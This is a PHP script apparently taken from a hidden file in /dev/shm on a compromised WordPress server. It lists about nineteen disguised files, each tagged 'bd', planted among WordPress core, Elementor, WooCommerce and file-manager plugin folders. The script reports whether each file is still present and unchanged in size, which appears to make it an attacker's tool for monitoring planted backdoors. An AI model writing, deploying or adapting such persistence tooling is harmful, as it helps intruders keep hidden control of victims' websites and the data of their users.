Current File : //proc/thread-self/root/dev/shm/.fac
<?php   $r = '/home/madrpjlj/public_html'; $x = ["/wp-includes/class-wp-session-tokens.php"=>"bd@@1340936@@71",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Util/Annotation/Class.php"=>"bd@@1339747@@955",
"/wp-content/plugins/elementor/vendor/elementor/wp-one-package/src/Admin/Controllers/referral_add_set.php"=>"bd@@1339761@@996",
"/wp-content/plugins/elementor/app/modules/import-export-customization/data/routes/traits/handles.quota.errors.php"=>"bd@@1339764@@885",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phar-io/manifest/src/xml/user_edit.php"=>"bd@@1340343@@1012",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Error/submit.php"=>"bd@@1340352@@1026",
"/wp-content/plugins/elementor/modules/atomic-widgets/prop-types/transform/functions/transform.rotate.prop.type.php"=>"bd@@1340366@@814",
"/wp-content/plugins/gallery-1769090972/css/custom.file.1.1769090973.php"=>"bd@@1162238@@915",
"/wp-content/plugins/cartflows/modules/elementor/widgets/class-cartflows-el-order-details-form.php"=>"bd@@1341088@@88",
"/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-terms-controller.php"=>"bd@@1341115@@87",
"/wp-content/plugins/social_1769170290/templates/admin-panel-cache.php"=>"bd@@1341126@@82",
"/wp-includes/block-supports/utils.php"=>"bd@@1341201@@99",
"/wp-content/plugins/woocommerce/patterns/coming-soon-store-only.php"=>"bd@@1341215@@41",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/myclabs/deep-copy/src/DeepCopy/TypeFilter/Spl/mod_gtranslate.php"=>"bd@@1341224@@945",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/myclabs/deep-copy/src/DeepCopy/Filter/invitation.php"=>"bd@@1341230@@1062",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Profiler/Node/klonecpp.php"=>"bd@@1341232@@1093",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Integrations/WooCommerce/Renderer/Blocks/class.product.sale.php"=>"bd@@1341237@@989",
"/wp-content/plugins/elementor/vendor/elementor/wp-one-package/src/Admin/Services/admin_header.php"=>"bd@@1341241@@913",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/myclabs/deep-copy/src/DeepCopy/Filter/Doctrine/Composite.php"=>"bd@@1339742@@1025"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');